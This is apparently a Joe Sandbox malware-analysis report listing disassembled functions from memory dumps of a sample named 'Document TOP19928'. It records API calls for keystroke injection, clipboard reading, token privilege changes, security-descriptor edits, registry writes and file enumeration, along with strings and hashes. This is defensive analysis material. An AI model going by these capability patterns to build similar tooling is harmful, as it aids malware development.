%d/%02d/%02d, xrefs: 00858478

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 4fd05c1493c31ee1fdcfcb04fd92e76fe7affd99ca7c4fa7ba6f4fc93f9d2869
Instruction ID: d534a1e8a6d877a75bd53874952d169247d0373681466326af64ee9ea95ba67d
Opcode Fuzzy Hash: 4fd05c1493c31ee1fdcfcb04fd92e76fe7affd99ca7c4fa7ba6f4fc93f9d2869
Instruction Fuzzy Hash: 7812B271500208EBEB259F64CC49FAB7BF8FF49716F10416AF915EA2A1EF748945CB10

Function 007E710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007E75C2
_memset.LIBCMT ref: 007E76B1
_memmove.LIBCMT ref: 007E7C4B
_memmove.LIBCMT ref: 007E7E4F

Strings

Oa~, xrefs: 0082287E
[:>:]], xrefs: 007E760A
Q\E, xrefs: 007E81C1
DEFINE, xrefs: 008225AF
\b(?=\w), xrefs: 00823C34
[:<:]], xrefs: 007E75F1
\b(?<=\w), xrefs: 00823C41

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Oa~$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-2114839338
Opcode ID: cecd2240049ffabcca8bedb47829bb42bac0dd0805268ac01c529707488d9cef
Instruction ID: 2d94b6cedbb27fbd7139701284df4eb76ecd20cb55cccf2d05af9a41ff96d839
Opcode Fuzzy Hash: cecd2240049ffabcca8bedb47829bb42bac0dd0805268ac01c529707488d9cef
Instruction Fuzzy Hash: 0B93A271A00229DFDB28CF58D891BADB7B1FF48714F25816AE945EB280E7749EC1CB50

Function 007D4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 007D4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0080DA8E
IsIconic.USER32(?), ref: 0080DA97
ShowWindow.USER32(?,00000009), ref: 0080DAA4
SetForegroundWindow.USER32(?), ref: 0080DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0080DAC4
GetCurrentThreadId.KERNEL32 ref: 0080DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0080DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0080DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0080DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0080DAF8
SetForegroundWindow.USER32(?), ref: 0080DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0080DB10
keybd_event.USER32(00000012,00000000), ref: 0080DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0080DB25
keybd_event.USER32(00000012,00000000), ref: 0080DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0080DB33
keybd_event.USER32(00000012,00000000), ref: 0080DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0080DB42
keybd_event.USER32(00000012,00000000), ref: 0080DB47
SetForegroundWindow.USER32(?), ref: 0080DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0080DB71

Strings

Shell_TrayWnd, xrefs: 0080DA89

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 3c10e71fb6aba24db3ccdbd73f83f46f2e715458caa57eeb708c4ff460d227b4
Instruction ID: 9fa148b3fd7ab4de7be41489520c5f74881832c955da40a06156190514c8062a
Opcode Fuzzy Hash: 3c10e71fb6aba24db3ccdbd73f83f46f2e715458caa57eeb708c4ff460d227b4
Instruction Fuzzy Hash: 2C315071A80318BBEB216FA19C4AF7F7E6CFB44B61F114065FB05EB1D1D6B45D00AAA0

Function 0084425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0085F910), ref: 00844284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00844292
GetClipboardData.USER32(0000000D), ref: 0084429A
CloseClipboard.USER32 ref: 008442A6
GlobalFix.KERNEL32(00000000), ref: 008442C2
CloseClipboard.USER32 ref: 008442CC
GlobalUnWire.KERNEL32(00000000), ref: 008442E1
IsClipboardFormatAvailable.USER32(00000001), ref: 008442EE
GetClipboardData.USER32(00000001), ref: 008442F6
GlobalFix.KERNEL32(00000000), ref: 00844303
GlobalUnWire.KERNEL32(00000000), ref: 00844337
CloseClipboard.USER32 ref: 00844447

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
String ID:
API String ID: 941120096-0
Opcode ID: 6207422b4677db97f8f138b98e9abb3a1056b9c2fd1c42b74f3493bb3441d54b
Instruction ID: 0c16cf2c18388a820168db2a48aad3d47fee7673f348e7f453d1649fbda6de39
Opcode Fuzzy Hash: 6207422b4677db97f8f138b98e9abb3a1056b9c2fd1c42b74f3493bb3441d54b
Instruction Fuzzy Hash: 0A51817120430AABD301AF64EC89F7E77A8FF84B01F10452AF656D32A2DB74D9048B62

Function 00828858 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00828CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00828D0D
Part of subcall function 00828CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828D3A
Part of subcall function 00828CC3: GetLastError.KERNEL32 ref: 00828D47

_memset.LIBCMT ref: 0082889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008288ED
CloseHandle.KERNEL32(?), ref: 008288FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00828915
GetProcessWindowStation.USER32 ref: 0082892E
SetProcessWindowStation.USER32(00000000), ref: 00828938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00828952

Part of subcall function 00828713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00828851), ref: 00828728
Part of subcall function 00828713: CloseHandle.KERNEL32(?,?,00828851), ref: 0082873A

Strings

default, xrefs: 0082894D
, xrefs: 008288AA
winsta0, xrefs: 00828910

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: f052666b5353f373da08d2e0c63982bb1b9fc88ecc8ccda5ff19575a0e65dd63
Instruction ID: 17adbff814623ad8880837aaf5ac8287508304df49d08c9d067e42ca94137d20
Opcode Fuzzy Hash: f052666b5353f373da08d2e0c63982bb1b9fc88ecc8ccda5ff19575a0e65dd63
Instruction Fuzzy Hash: 08814A71902229EFDF11DFA4EC49AEE7BB8FF04305F08412AF911E6261DF358A549B61

Function 0083C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0083C9F8
FindClose.KERNEL32(00000000), ref: 0083CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 0083CAAF
__swprintf.LIBCMT ref: 0083CAFB
__swprintf.LIBCMT ref: 0083CB3E

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

__swprintf.LIBCMT ref: 0083CB92

Part of subcall function 007F38D8: __woutput_l.LIBCMT ref: 007F3931

__swprintf.LIBCMT ref: 0083CBE0

Part of subcall function 007F38D8: __flsbuf.LIBCMT ref: 007F3953
Part of subcall function 007F38D8: __flsbuf.LIBCMT ref: 007F396B

__swprintf.LIBCMT ref: 0083CC2F
__swprintf.LIBCMT ref: 0083CC7E
__swprintf.LIBCMT ref: 0083CCCD

Strings

%4d, xrefs: 0083CB38
%02d, xrefs: 0083CB86, 0083CB90, 0083CBDE, 0083CC2D, 0083CC7C, 0083CCCB
%4d%02d%02d%02d%02d%02d, xrefs: 0083CAF5

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 80c727e99c487b8aad4694dd51d0ef05ae03b665e91000b7ba79db0ede5dfdc3
Instruction ID: 0882995649e626a89df71256c3636a446883b53b89ea59c010558e3ee50c2d08
Opcode Fuzzy Hash: 80c727e99c487b8aad4694dd51d0ef05ae03b665e91000b7ba79db0ede5dfdc3
Instruction Fuzzy Hash: 15A132B1508315EBC714EB54C889DAFB7FCFF94704F40491AB685D7291EA38DA08C762

Function 0083F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0083F221
_wcscmp.LIBCMT ref: 0083F236
_wcscmp.LIBCMT ref: 0083F24D
GetFileAttributesW.KERNEL32(?), ref: 0083F25F
SetFileAttributesW.KERNEL32(?,?), ref: 0083F279
FindNextFileW.KERNEL32(00000000,?), ref: 0083F291
FindClose.KERNEL32(00000000), ref: 0083F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 0083F2B8
_wcscmp.LIBCMT ref: 0083F2DF
_wcscmp.LIBCMT ref: 0083F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 0083F308
SetCurrentDirectoryW.KERNEL32(0088A5A0), ref: 0083F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 0083F330
FindClose.KERNEL32(00000000), ref: 0083F33D
FindClose.KERNEL32(00000000), ref: 0083F34F

Strings

*.*, xrefs: 0083F2B3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: b03919ad2a3d1ef3d2472d1f58aabe662ed221c8f13b3c8bf275b99ff31af5e0
Instruction ID: bd308a813252ceb81390bf6d4af60ea2113d9ee4bacc5ad326de8dc4c893f8d5
Opcode Fuzzy Hash: b03919ad2a3d1ef3d2472d1f58aabe662ed221c8f13b3c8bf275b99ff31af5e0
Instruction Fuzzy Hash: 8131BA76900219AADB10EBB4DC49ADF73ACFF48361F144176FA14D32A1DB38DA45CAD0

Function 00850AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,0085F910,00000000,?,00000000,?,?), ref: 00850C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00850C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00850D1D
RegCloseKey.ADVAPI32(?), ref: 0085103D
RegCloseKey.ADVAPI32(00000000), ref: 0085104A

Strings

REG_DWORD, xrefs: 00850F0E
REG_QWORD, xrefs: 00850F8B
REG_BINARY, xrefs: 00850FD8
REG_EXPAND_SZ, xrefs: 00850CBA
REG_MULTI_SZ, xrefs: 00850E05
REG_SZ, xrefs: 00850D5B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 763c13b3f388e74620c3a4fe9a54d3db69f55ba6a11acf66ca3c4b27b05f8224
Instruction ID: bccad4ee6f2ece88525765d7883eb9747fc44de958e7e00ff921f90a24015be8
Opcode Fuzzy Hash: 763c13b3f388e74620c3a4fe9a54d3db69f55ba6a11acf66ca3c4b27b05f8224
Instruction Fuzzy Hash: 50022875204611DFCB14EF14C899A2AB7E5FF88724F04885DF99A9B3A2CB34ED45CB81

Function 0085C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

DragQueryPoint.SHELL32(?,?), ref: 0085C917

Part of subcall function 0085ADF1: ClientToScreen.USER32(?,?), ref: 0085AE1A
Part of subcall function 0085ADF1: GetWindowRect.USER32(?,?), ref: 0085AE90
Part of subcall function 0085ADF1: PtInRect.USER32(?,?,0085C304), ref: 0085AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 0085C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0085C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0085C9AE
_wcscat.LIBCMT ref: 0085C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0085C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 0085CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 0085CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 0085CA47
DragFinish.SHELL32(?), ref: 0085CA4E
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0085CB41

Strings

@GUI_DRAGFILE, xrefs: 0085CAF0
@GUI_DRAGID, xrefs: 0085CAB9
@GUI_DROPID, xrefs: 0085CA6E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: a9253343c581b75e5e4a3b2e5afc87c83a96710d1a9574c6c05e72c417e23eb9
Instruction ID: 9c783c506709bbc21bd634d3dd884b26992245830caf9cc51e23833013db77b2
Opcode Fuzzy Hash: a9253343c581b75e5e4a3b2e5afc87c83a96710d1a9574c6c05e72c417e23eb9
Instruction Fuzzy Hash: DD615E71108301AFC711EF64CC89D9BBBF8FF98751F04092EF691922A1EB749A49CB52

Function 0083F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0083F37E
_wcscmp.LIBCMT ref: 0083F393
_wcscmp.LIBCMT ref: 0083F3AA

Part of subcall function 008345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008345DC

FindNextFileW.KERNEL32(00000000,?), ref: 0083F3D9
FindClose.KERNEL32(00000000), ref: 0083F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 0083F400
_wcscmp.LIBCMT ref: 0083F427
_wcscmp.LIBCMT ref: 0083F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 0083F450
SetCurrentDirectoryW.KERNEL32(0088A5A0), ref: 0083F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0083F478
FindClose.KERNEL32(00000000), ref: 0083F485
FindClose.KERNEL32(00000000), ref: 0083F497

Strings

*.*, xrefs: 0083F3FB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: f82b0851ebd99c8f0bbd76588d02390164e39618c39e65aa37b5216b8de45e6a
Instruction ID: 2d8b06274567241cccb330caa7f8a24484466a1161579b7481da4c7abb393183
Opcode Fuzzy Hash: f82b0851ebd99c8f0bbd76588d02390164e39618c39e65aa37b5216b8de45e6a
Instruction Fuzzy Hash: 2131D7719012196BDB10ABA4EC88ADF77ACFF85365F100175FA10E32A2D778DE44CAE4

Function 0085C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0085C4EC
GetFocus.USER32 ref: 0085C4FC
GetDlgCtrlID.USER32(00000000), ref: 0085C507
_memset.LIBCMT ref: 0085C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0085C65D
GetMenuItemCount.USER32(?), ref: 0085C67D
GetMenuItemID.USER32(?,00000000), ref: 0085C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0085C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0085C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0085C744
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0085C779

Strings

0, xrefs: 0085C62A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 19471fd5186225bc1e706519b91f1184fff44f75d06a7ff07aceda1c89751557
Instruction ID: 32002ea743e7d7f3e77ee138808725d15298403e5ef58c47bb5642d6fde06fb7
Opcode Fuzzy Hash: 19471fd5186225bc1e706519b91f1184fff44f75d06a7ff07aceda1c89751557
Instruction Fuzzy Hash: 1F816974208305AFDB10DF28C884A6BBBE8FB98356F04452EF995D7291D770D909CFA2

Function 008281F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00828766
Part of subcall function 0082874A: GetLastError.KERNEL32(?,0082822A,?,?,?), ref: 00828770
Part of subcall function 0082874A: GetProcessHeap.KERNEL32(00000008,?,?,0082822A,?,?,?), ref: 0082877F
Part of subcall function 0082874A: RtlAllocateHeap.NTDLL(00000000,?,0082822A), ref: 00828786
Part of subcall function 0082874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0082879D

Part of subcall function 008287E7: GetProcessHeap.KERNEL32(00000008,00828240,00000000,00000000,?,00828240,?), ref: 008287F3
Part of subcall function 008287E7: RtlAllocateHeap.NTDLL(00000000,?,00828240), ref: 008287FA
Part of subcall function 008287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00828240,?), ref: 0082880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0082825B
_memset.LIBCMT ref: 00828270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0082828F
GetLengthSid.ADVAPI32(?), ref: 008282A0
GetAce.ADVAPI32(?,00000000,?), ref: 008282DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008282F9
GetLengthSid.ADVAPI32(?), ref: 00828316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00828325
RtlAllocateHeap.NTDLL(00000000), ref: 0082832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0082834D
CopySid.ADVAPI32(00000000), ref: 00828354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00828385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008283AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008283BF

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
